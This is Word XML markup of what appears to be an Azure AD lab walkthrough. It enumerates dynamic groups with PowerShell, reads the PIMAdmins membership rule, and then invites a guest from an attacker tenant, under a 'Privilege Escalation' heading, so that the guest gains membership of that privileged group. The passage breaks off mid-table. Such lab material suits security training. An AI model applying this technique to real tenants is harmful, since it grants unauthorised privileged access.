        <w:gridCol w:w="13500"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="6BAF9E1C" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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9CFBE7E"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PS C:\AzAD\Tools&gt; Remove-Module AzureAD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61CBE128" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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PS C:\AzAD\Tools&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Import-Module C:\AzAD\Tools\AzureADPreview\2.0.2.138\AzureADPreview.psd1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65899F42" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="30"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PS C:\AzAD\Tools&gt; Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B519108" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2370"/>
        <w:gridCol w:w="3480"/>
        <w:gridCol w:w="3240"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="27FA331E" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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335B94C"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Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="348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F1266D6"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DisplayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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FFFEB7E"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="35CC4D89" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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487C06B" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="348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26ED9D64" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="32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4BBDAFA" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="2430B124" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79C75AC1" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>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750d8501-0ad2-4039-b587-993794f6cbd7 PIMAdmins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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FF1A415" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>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Members of this group have</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="32905748" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B088120"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privileges to manage privileged identities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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04E9AAB" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="15" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="68043AB0" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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67131BB" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="348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F8DC534" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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CD30F72" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="60" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="054C6D93" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="555" w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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Let's check what is the Membership Rule for the dynamic group 'PIMAdmins'. Run the below command using Azure AD Preview module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601448A3" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13500" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13500"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="75C9A456" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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53383D0"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PS C:\AzAD\Tools&gt; Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'} | select MembershipRule</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="245479F0" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="315"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MembershipRule</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D6A894" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="610E1F0A" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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(user.mail -contains "pim") or (user.mail -contains "pimadmin") or (user.mail -contains "operations") and (user.userType -eq "guest")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53B2720C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="600" w:after="0" w:line="270" w:lineRule="atLeast"/>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So, the membership rule makes anyone who is a Guest (notice the 'and' rule) and has 'pim', 'pimadmin' or 'operation' in their email ID to be a member!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE2B78" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="435EBE"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23669720" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="30" w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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We have to invite a user who has 'pim', 'pimadmin' or 'operation' in their email ID to get membership of the PIMAdmins group. We will use the attacker tenant that you created as detailed in the 'Lab Prerequisites'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C07C45" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="270" w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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Use the below command from the Azure AD module to invite a guest. Please note that I am using a guest from a tenant that I created. You have to use your own attacker tenant that you created as detailed in the 'Lab Prerequisites'. Make sure that the invited user has email that contains 'pim', 'pimadmin' or 'operation' and you choose a unique value for the 'InvitedUserDisplayName' below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406C2E25" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13200" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13200"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="70B02A91" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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1331B6F"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PS C:\AzAD\Tools&gt; New-AzureADMSInvitation -InvitedUserDisplayName "InvitedAttacker1" -InvitedUserEmailAddress "pim@tnjg4.onmicrosoft.com" -InviteRedirectURL https://portal.azure.com -</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SendInvitationMessage $true</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="315DF430" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2850"/>
        <w:gridCol w:w="6240"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="23B80684" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="705"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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C6DA47C"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Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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54C1B17"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 7fc83dee-1dc1-4045-9279-3c0c46d49c03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="11F45B9E" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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5DEC287"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InvitedUserDisplayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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2DD9A74F"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 InvitedAttacker1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="05812581" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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66B6EAC"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InvitedUserEmailAddress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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281B81E"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 pim@tnjg4.onmicrosoft.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="78D6D8E0" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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68867BB"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SendInvitationMessage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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A004EAA"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 True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="59A2772F" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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54AF2CC"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InviteRedeemUrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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7516BD5" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="62A5E6D4" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="45"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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8C337BD" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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62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43E3C8F" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="4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bl>
    <w:p w14:paraId="11954BA7" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13500" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="14048"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="0F8374E4" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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27840A14" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>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https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.micro soft.com%2fredeem%2f%3ftenant%3d711c59fe-8dee-40c0-adc1- ed08f738de43%26user%3d7fc83dee-1dc1-4045-9279- 3c0c46d49c03%26ticket%3dU7%252fiTvkrk%252frHPJp672mGpHIrRgaXv0FZejWkWVTgHFs %253d%26ver%3d2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4127F737" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2910"/>
        <w:gridCol w:w="6180"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="03EDD91E" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="291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543CF26" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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InviteRedirectUrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618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56EBA4D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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 https://portal.azure.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="3D218B01" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="225"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="291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56AF0FC4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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InvitedUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618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4FCB111" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="225"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 class User {</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="36CD8E67" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="291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ADE772F"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618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538F2D66"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Id: 56bca284-034b-4846-89a1-6371048cf29f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="795BF127" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="291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6DCD1EC"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618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06E0FAB"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OdataType:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="15925781" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="291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573F63CC"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618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5E4620D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
